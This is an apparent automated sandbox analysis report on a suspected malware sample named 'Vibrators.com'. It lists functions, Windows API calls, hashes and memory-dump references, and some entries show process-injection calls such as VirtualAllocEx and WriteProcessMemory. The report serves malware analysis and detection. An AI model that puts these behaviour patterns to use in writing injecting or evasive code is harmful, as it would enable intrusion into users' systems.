CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?,?,?,00A50C4E), ref: 00A5091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?,?), ref: 00A50936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?,?), ref: 00A50944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?), ref: 00A50954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A50831,80070057,?,?), ref: 00A50960

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 90d1c37754c10f0a47f4dc4285914e9eb6d206f2fb27e1eb1cfee45cbd04924a
Instruction ID: 5bbf5c68da7764ce47b010e8be96b1a2c1dfc61cafba12896522603c622b0967
Opcode Fuzzy Hash: 90d1c37754c10f0a47f4dc4285914e9eb6d206f2fb27e1eb1cfee45cbd04924a
Instruction Fuzzy Hash: F3017872600205EFEB108FA9DC44F9A7BADFF847A2F140124FD05E6256E771DD459BA0

Function 00A5F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00A5F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00A5F2BC
Sleep.KERNEL32(00000000), ref: 00A5F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00A5F2CE
Sleep.KERNEL32 ref: 00A5F30A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: c81bab07bf04bc3c9d4f461a3076305db08de2b4850a6a36ee0cfa65bbebc99c
Instruction ID: a24cc247b4df04b6a56e371b76519b0d72813a49664ff3d9ad4facdd1a69ba5b
Opcode Fuzzy Hash: c81bab07bf04bc3c9d4f461a3076305db08de2b4850a6a36ee0cfa65bbebc99c
Instruction Fuzzy Hash: 6E015771C01619DFDF00EFE4E849AEEBB79BF08712F000566E951B2290DB309558C7A1

Function 00A51A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A514E7,?,?,?), ref: 00A51A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A51A99

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 95f695f161e8d42e94186bfbe9fe6076000266b2b36c062c65775c12079acd18
Instruction ID: abdc0816b9d25d6c4d2e526b87b68b7d3f406d84de1c27a15dd8519fb9878e3d
Opcode Fuzzy Hash: 95f695f161e8d42e94186bfbe9fe6076000266b2b36c062c65775c12079acd18
Instruction Fuzzy Hash: F3018CB9601205BFDB128FA4DC48E6A3B6EFF883A5F210424FD45C72A0DA31DC418B60

Function 00A51900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A51916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A51922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A51931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A51938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A5194E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: e8c07754d6f091d6392faad53b4aa3421b19dbddf646c07b481c71459ebc9e37
Instruction ID: 07b5a200f342b1b5eed6e5371363b8b1c3ab36dab8d0110016133cf9ebab9509
Opcode Fuzzy Hash: e8c07754d6f091d6392faad53b4aa3421b19dbddf646c07b481c71459ebc9e37
Instruction Fuzzy Hash: 61F04975200302ABDB214FA5AC4DF663BADFF897A1F110424FA45DB2A0CA70DC02CB60

Function 00A51960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A51976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A51982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A519AE

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 377a63699b9d401787641383030d89e8aa898f2a1960f0861d5bc20d6db5a0c2
Instruction ID: 718d0aa0d59f02e2f8c1742e6e62bef5953a047cf6f0b9049c95f86cdf77e66e
Opcode Fuzzy Hash: 377a63699b9d401787641383030d89e8aa898f2a1960f0861d5bc20d6db5a0c2
Instruction Fuzzy Hash: 59F04F75100301ABD7218FA4EC99F563B6DFF897A1F100514FD45CB290CA70D801CB60

Function 00A60CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00A60B24,?,00A63D41,?,00000001,00A33AF4,?), ref: 00A60CCB
CloseHandle.KERNEL32(?,?,?,?,00A60B24,?,00A63D41,?,00000001,00A33AF4,?), ref: 00A60CD8
CloseHandle.KERNEL32(?,?,?,?,00A60B24,?,00A63D41,?,00000001,00A33AF4,?), ref: 00A60CE5
CloseHandle.KERNEL32(?,?,?,?,00A60B24,?,00A63D41,?,00000001,00A33AF4,?), ref: 00A60CF2
CloseHandle.KERNEL32(?,?,?,?,00A60B24,?,00A63D41,?,00000001,00A33AF4,?), ref: 00A60CFF
CloseHandle.KERNEL32(?,?,?,?,00A60B24,?,00A63D41,?,00000001,00A33AF4,?), ref: 00A60D0C

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b88a44f471f4caab54b93f792a4d7e8ae3e33307a02cce61da9e3aab80739496
Instruction ID: 8cd99a2439c9a954d90fdb70d75a0339811482087ba2a7d11cc524fd13a2d9d9
Opcode Fuzzy Hash: b88a44f471f4caab54b93f792a4d7e8ae3e33307a02cce61da9e3aab80739496
Instruction Fuzzy Hash: D7019C71800B15DFCB30AFA6D980817FBF9BE602153158A3ED19652961C7B0A999DF80

Function 00A565AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00A565BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00A565D6
MessageBeep.USER32(00000000), ref: 00A565EE
KillTimer.USER32(?,0000040A), ref: 00A5660A
EndDialog.USER32(?,00000001), ref: 00A56624

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5bb320fbe07f99647ededa59fa3b019d726f7b368353e0e82ed48a6f9f350ed2
Instruction ID: 2776239cc14f82db049e57e07559cb41af269fba651dff5930ea0db0e3105d93
Opcode Fuzzy Hash: 5bb320fbe07f99647ededa59fa3b019d726f7b368353e0e82ed48a6f9f350ed2
Instruction Fuzzy Hash: 78018670500308ABEB249F50DD4EF96BB78FF04706F400669B586624E1EBF0AA89CB50

Function 00A2DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A2DAD2

Part of subcall function 00A22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2DB51,00AC1DC4,00000000,00AC1DC4,00000000,?,00A2DB78,00AC1DC4,00000007,00AC1DC4,?,00A2DF75,00AC1DC4), ref: 00A22D4E
Part of subcall function 00A22D38: GetLastError.KERNEL32(00AC1DC4,?,00A2DB51,00AC1DC4,00000000,00AC1DC4,00000000,?,00A2DB78,00AC1DC4,00000007,00AC1DC4,?,00A2DF75,00AC1DC4,00AC1DC4), ref: 00A22D60

_free.LIBCMT ref: 00A2DAE4
_free.LIBCMT ref: 00A2DAF6
_free.LIBCMT ref: 00A2DB08
_free.LIBCMT ref: 00A2DB1A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9051105835ea8c4f6169b8db0564a76370ccb9ef7ccdf52a7e66e3082a049620
Instruction ID: fc452c32b43ae06cb65b49d2fd0099fb09f86f75800aa30e59f546bf0bba2bf6
Opcode Fuzzy Hash: 9051105835ea8c4f6169b8db0564a76370ccb9ef7ccdf52a7e66e3082a049620
Instruction Fuzzy Hash: 4BF01D32585225BB8624EBACFA86D1A77EDEE047517A50C25F009D7912DB30FC808B64

Function 00A22610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A2262E

Part of subcall function 00A22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2DB51,00AC1DC4,00000000,00AC1DC4,00000000,?,00A2DB78,00AC1DC4,00000007,00AC1DC4,?,00A2DF75,00AC1DC4), ref: 00A22D4E
Part of subcall function 00A22D38: GetLastError.KERNEL32(00AC1DC4,?,00A2DB51,00AC1DC4,00000000,00AC1DC4,00000000,?,00A2DB78,00AC1DC4,00000007,00AC1DC4,?,00A2DF75,00AC1DC4,00AC1DC4), ref: 00A22D60

_free.LIBCMT ref: 00A22640
_free.LIBCMT ref: 00A22653
_free.LIBCMT ref: 00A22664
_free.LIBCMT ref: 00A22675

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3403d7a637f62b270b64f5283afa1d169d6820e455b7f870bc3ab54219887f38
Instruction ID: 17fbe49e313df9e94f0f6ff8c1d4b8b7e9d3cade7e2a0d68dc99ccfd37601f95
Opcode Fuzzy Hash: 3403d7a637f62b270b64f5283afa1d169d6820e455b7f870bc3ab54219887f38
Instruction Fuzzy Hash: EAF0DA71941230AB8622EFDCFD01E883B68FF257523460A6BF42496276DB354903AFC4

Function 00A212B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00A21469
__freea.LIBCMT ref: 00A21487

Part of subcall function 00A218A7: _free.LIBCMT ref: 00A218BF

Strings

am/pm, xrefs: 00A214EA
a/p, xrefs: 00A2154E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 8f8f8801b380f79ae656e8d442e15e75bf25fd001b51214a000a562d204ef2d9
Instruction ID: 53420cdebfb8792941722af416bafc6ef9b0b4f796574a49e51cb8fae23df1e5
Opcode Fuzzy Hash: 8f8f8801b380f79ae656e8d442e15e75bf25fd001b51214a000a562d204ef2d9
Instruction Fuzzy Hash: 0DD11375900226DBCB289F6CE855BFEB7B1FF65300F28417AE9069B650D3359D81CB90

Function 009FCF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009FD253

Strings

p6, xrefs: 009FCFB0
8K, xrefs: 009FCFBB, 009FD067
PG, xrefs: 009FCFB1, 009FD05C

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Init_thread_footer
String ID: 8K$PG$p6
API String ID: 1385522511-3558827682
Opcode ID: c300d4ac94e3133f645ef9ed0fd7063528b9d54c1b6fa95667bb48dd1a194333
Instruction ID: 9bc57d47f3a2519041716f5323a2cbdc58aaba70738fc4f43bffb5dcb4dcb36a
Opcode Fuzzy Hash: c300d4ac94e3133f645ef9ed0fd7063528b9d54c1b6fa95667bb48dd1a194333
Instruction Fuzzy Hash: 0A915BB5A0120ADFCB18CF98C480AB9B7F2FF59314F24855ADA55A7340D735EA82DF90

Function 00A53063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A52B1D,?,?,00000034,00000800,?,00000034), ref: 00A5BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A530AD

Part of subcall function 00A5BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A52B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00A5BDBF

Part of subcall function 00A5BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00A5BD1C
Part of subcall function 00A5BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A52AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A5BD2C
Part of subcall function 00A5BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A52AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A5BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A5311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A53167

Strings

@, xrefs: 00A5317F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: f0b88c59d4bfb141a375b80a0fd3fce5d4776d6078b4f06873bf865f2135947e
Instruction ID: 0fefeb24f3d4334c10ee32b038f3182a9467c97648fac3943b3f7d9da9bbaeeb
Opcode Fuzzy Hash: f0b88c59d4bfb141a375b80a0fd3fce5d4776d6078b4f06873bf865f2135947e
Instruction Fuzzy Hash: 57411872900218BFDF10DBA4CD81AEEBBB8FF49741F104195EA45B7181DA706E89CBA0

Function 00A21A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\415434\Vibrators.com,00000104), ref: 00A21AD9
_free.LIBCMT ref: 00A21BA4
_free.LIBCMT ref: 00A21BAE

Strings

C:\Users\user\AppData\Local\Temp\415434\Vibrators.com, xrefs: 00A21AD0, 00A21AD7, 00A21B06, 00A21B3E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
API String ID: 2506810119-3864280721
Opcode ID: c8671f7f412ba19bbe1fa85ef4ab5f59d756bd5e6baa8908864bf7269b1c6a5e
Instruction ID: cc0df81d17f3b3aadb74abaf58b2125978947c969211eaf76d9bc80f3e4c006f
Opcode Fuzzy Hash: c8671f7f412ba19bbe1fa85ef4ab5f59d756bd5e6baa8908864bf7269b1c6a5e
Instruction Fuzzy Hash: AF317E71A00228AFDB21DF9DED85E9EBBFCEF95750B1141B6E80497221E6708E41CB90

Function 00A5CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A5CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00A5CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AC29C0,00C65940), ref: 00A5CC40

Strings

0, xrefs: 00A5CB8A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: bb0884addc43c81fe5e9f095a2422b09526d6c5dcdbb880bb4adbbd83cc43318
Instruction ID: 9bb85305d25acfb556007b865cdd4e733933bf44974434a67198cfd5964ca71d
Opcode Fuzzy Hash: bb0884addc43c81fe5e9f095a2422b09526d6c5dcdbb880bb4adbbd83cc43318
Instruction Fuzzy Hash: E941D2712043029FD720DF28D985B2ABBE8FF84725F14461DF9A9972D5D730E948CB52

Function 00A84EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A8DCD0,00000000,?,?,?,?), ref: 00A84F48
GetWindowLongW.USER32 ref: 00A84F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A84F75

Strings

SysTreeView32, xrefs: 00A84F1A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 74e606db45d1ac391155236cd45c19fb8f4dd8108ba097e580a78014fc219678
Instruction ID: a0e8db168c577c84f89522691e1495800dfe5cc2e989c10d5964a7dd70273a1f
Opcode Fuzzy Hash: 74e606db45d1ac391155236cd45c19fb8f4dd8108ba097e580a78014fc219678
Instruction Fuzzy Hash: A631B07121420AAFDB20AF78CC45BEA7BA9FF48334F204719FA75921E0D774AC519B50

Function 00A73AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A73DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A73AD4,?,?), ref: 00A73DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A73AD7
_wcslen.LIBCMT ref: 00A73AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00A73B63

Strings

255.255.255.255, xrefs: 00A73AF2, 00A73AF7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

